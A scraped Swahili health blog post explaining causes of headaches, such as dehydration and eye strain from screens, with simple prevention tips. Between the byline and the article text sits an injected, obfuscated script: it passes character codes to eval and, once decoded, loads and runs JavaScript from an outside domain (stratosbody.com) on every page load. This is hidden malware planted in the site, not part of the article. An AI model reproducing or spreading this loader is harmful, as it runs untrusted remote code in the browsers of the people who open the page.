Recent Comments

Hizi ndiyo Sababu za Kuumwa Kichwa

By ventas malack Apr 26, 2022
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Maumivu ya kichwa ni changamoto sana kwa watu wengi maana hupelekea kushindwa kufanya kazi na hata athari zingine za kiafya ambapo kuna sababu nyingi zinazopelekea maumiviu hayo.
Yafuatavyo ni Mazingira yanayofanya upate Maumivu ya Kichwa;
-Mwili kupungukiwa na maji
Watu hupata maumivu ya kichwa pale mwili unapopungukiwa na maji. Kama unapata maumivu ya kichwa baada ya kutapika sana, kutokwa na jasho jingi au mafua ya muda mrefu ni wazi kwamba unahitaji kunywa maji mengi ili kuondoa tatizo lako.
Kama ni mtu wa mazoezi sana na huna tabia ya kunywa maji ya kutosha mwili utapungukiwa na maji na ni lazima kichwa kitauma. Kwenye majira ya joto sana hupelekea mwili kutoa jasho jingi na kuishiwa maji. Kumbuka kwamba mwili unahitaji maji ya kutosha ili kuendesha shuguli za ndani.
-Mwanga wa simu, computer na vifaa mbalimbali
Kuangalia TV kwa muda mrefu ama matumizi makubwa aya simu yanafanya misuli ya macho kukaza na hatimaye kupelekea macho kuuma. Vitu vingine vinavyopelekea kukaza kwa misuli ya macho ni kama  kutazama kitu kimoja ama upande mmoja.
Kwa muda mrefu mfano unapoendesha gari na kusoma. Kukaa kwenye mazingira yenye mwanga mkali sana ama mwanga hafifu, mwili kuwa mchovu na ukavu wa macho.
-Badili uelekeo wa macho
Kutatua changamoto hii ya kukaza kwa misuli ya macho. Hakikisha badili uelekeo wa mahali unapoangalia kila mbaada ya dakika 20. Kama kuna kazi inakutaka utumie muda mwingi kuifatilia kwa macho basi hakikisha unabalansi na shughuli zingine ambazo zinahitaji pia matumizi ya macho.
-Hakikisha pia kifaa chako kama simu, computer ama televisheni kipo mbali kuanzia cm 30 . Simu unapotumia iweke katika usawa wa chini kidogo na level ya macho.

By ventas malack

Make the World Aware